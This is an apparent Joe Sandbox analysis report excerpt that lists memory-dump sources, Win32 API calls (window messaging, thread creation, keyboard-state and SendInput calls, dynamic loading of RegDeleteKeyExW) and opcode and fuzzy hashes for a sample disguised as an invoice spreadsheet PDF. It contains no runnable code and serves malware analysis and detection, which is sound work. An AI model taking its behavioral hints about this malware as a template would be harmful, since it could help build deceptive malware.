                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CountItemStringWindow_wcslen
                                                                              • String ID:
                                                                              • API String ID: 1823500076-0
                                                                              • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                              • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                              • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                              • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$MessageMoveSend
                                                                              • String ID:
                                                                              • API String ID: 896007046-0
                                                                              • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                              • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                              • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                              • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                              • SendMessageW.USER32(02FD1B28,000000F1,00000000,00000000), ref: 004414C6
                                                                              • SendMessageW.USER32(02FD1B28,000000F1,00000001,00000000), ref: 004414F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                              • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                              • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                              • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 004484C4
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                              • IsMenu.USER32(?), ref: 0044857B
                                                                              • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                              • DrawMenuBar.USER32 ref: 004485E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                              • String ID: 0
                                                                              • API String ID: 3866635326-4108050209
                                                                              • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                              • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                              • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                              • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                              • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                              • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                              • String ID: 0vH
                                                                              • API String ID: 327565842-3662162768
                                                                              • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                              • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                              • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                              • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                              • GetFocus.USER32 ref: 00448B1C
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$FocusMessageSend
                                                                              • String ID:
                                                                              • API String ID: 3429747543-0
                                                                              • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                              • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                              • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                              • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                              • __swprintf.LIBCMT ref: 0045D3CC
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu$HH
                                                                              • API String ID: 3164766367-3924996404
                                                                              • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                              • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                              • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                              • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 3850602802-3636473452
                                                                              • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                              • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                              • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                              • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                              • __calloc_crt.LIBCMT ref: 00415743
                                                                              • __getptd.LIBCMT ref: 00415750
                                                                              • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                              • __dosmaperr.LIBCMT ref: 004157A9
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1269668773-0
                                                                              • Opcode ID: 0d7b65c6ab38dbefdfd62d93c8bf275ac45e934a4136d591895be9c5171332a1
                                                                              • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                              • Opcode Fuzzy Hash: 0d7b65c6ab38dbefdfd62d93c8bf275ac45e934a4136d591895be9c5171332a1
                                                                              • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                              APIs
                                                                                • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                              • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                              • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                              • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                              • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                              • ExitThread.KERNEL32 ref: 004156BD
                                                                              • __freefls@4.LIBCMT ref: 004156D9
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                              • String ID:
                                                                              • API String ID: 4166825349-0
                                                                              • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                              • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                              • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                              • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                              • API String ID: 2574300362-3261711971
                                                                              • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                              • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                              • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                              • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                              • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                              • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                              • Instruction Fuzzy Hash: 4BF16D71108740AFD210DB59C880EABB7F9EFCA744F10891EF69983261D735AC45CBAA
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00433724
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                              • GetClientRect.USER32(0000001D,?), ref: 004337AC
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                              • GetWindowRect.USER32(?,?), ref: 00433814
                                                                              • ScreenToClient.USER32(?,?), ref: 00433842
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                              • String ID:
                                                                              • API String ID: 3220332590-0
                                                                              • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                              • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                              • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                              • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1612042205-0
                                                                              • Opcode ID: 298a8227742eef536ee76f08e60d027b048ca96b1c7160c0af7ff60100d0c469
                                                                              • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                              • Opcode Fuzzy Hash: 298a8227742eef536ee76f08e60d027b048ca96b1c7160c0af7ff60100d0c469
                                                                              • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                              • SendInput.USER32 ref: 0044C6E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
